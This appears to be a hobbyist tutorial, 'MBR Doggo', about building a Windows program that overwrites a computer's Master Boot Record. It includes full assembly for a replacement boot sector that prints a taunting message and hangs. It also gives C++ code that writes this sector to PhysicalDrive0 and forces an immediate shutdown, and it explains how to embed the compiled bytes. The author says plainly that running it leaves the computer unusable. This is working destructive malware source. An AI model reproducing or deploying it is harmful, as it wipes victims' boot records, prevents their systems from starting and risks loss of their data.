MBR Doggo
MBR Doggo is a small Windows executable that will override your Masterbootrecord with custom Assembly code thus stopping Windows from booting and running my own Assembly code.
The MBR has a maximum size of 512 Bytes and is located at the beginning of the disk. The BIOS will read these 512 Bytes and checks if the last byte is set to 0xAA55 (The standard boot signature) if this is true the BIOS will attempt to execute the code stored in the first 512 Bytes of the disk, If this is false the BIOS will try to read the next drive, USB Stick, DVD player etc.
Assembly
On a normal working Windows installation the MBR can for example contain code that tells the BIOS to start loading code on part XXX of the disk which in turn starts loading the OS.
In our case Windows never gets a chance to load because the MBR has been overwritten with a small piece of code that displays an onscreen message and then drops into a infinite loop.
MBR.asm
BITS 16
start:
mov ax, 07C0h
add ax, 288
mov ss, ax
mov sp, 4096
mov ax, 07C0h
mov ds, ax
mov si, text_string
call print_string
jmp $
text_string db 'You have been visited by the MBR doggo',13,10,'Sleep tite Windows.',0
print_string:
mov ah, 0Eh
.repeat:
lodsb
cmp al, 0
je .done
int 10h
jmp .repeat
.done:
ret
times 510-($-$$) db 0 ; Pad remainder of boot sector with 0s
dw 0xAA55 ; The standard PC boot signature
Now if we write the compiled binary version to the bootloader of a usb drive and try booting from it using QEMU we get the following results
Great! Now that we know that it's working we can start writing our C++ program that will be used to overwrite the bootloader.
MBRDoggo.cpp
#include <windows.h>
#include <conio.h>
#include <stdio.h>
void ripMBR() {
DWORD write;
char data[] = { (INSERT HEX MBR PAYLOAD HERE) };
//MBR Payload
HANDLE disk = CreateFile("\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0);
WriteFile(disk, data, 512, &write, NULL);
CloseHandle(disk);
//MessageBox(0, "Thanks for using MBR doggo!", "Sleep Tite", MB_ICONWARNING);
system("shutdown -s -t 0");
}
void main() {
ripMBR();
}
The Payload
I have converted the new MBR binary we just created into a comma separated hex string and stored it inside an array. Of course you can read the binary as an external file and use it that way but I wanted to keep it simple and all in one .exe file and this is my way of doing so.
Example conversion
0xB8,0xC0,0x07,0x05,0x20,0x01,0x8E,0xD0,0xBC, (You get the idea)
That's about it really now if you run this .exe it will overwrite your MBR and reboot the computer rendering it useless.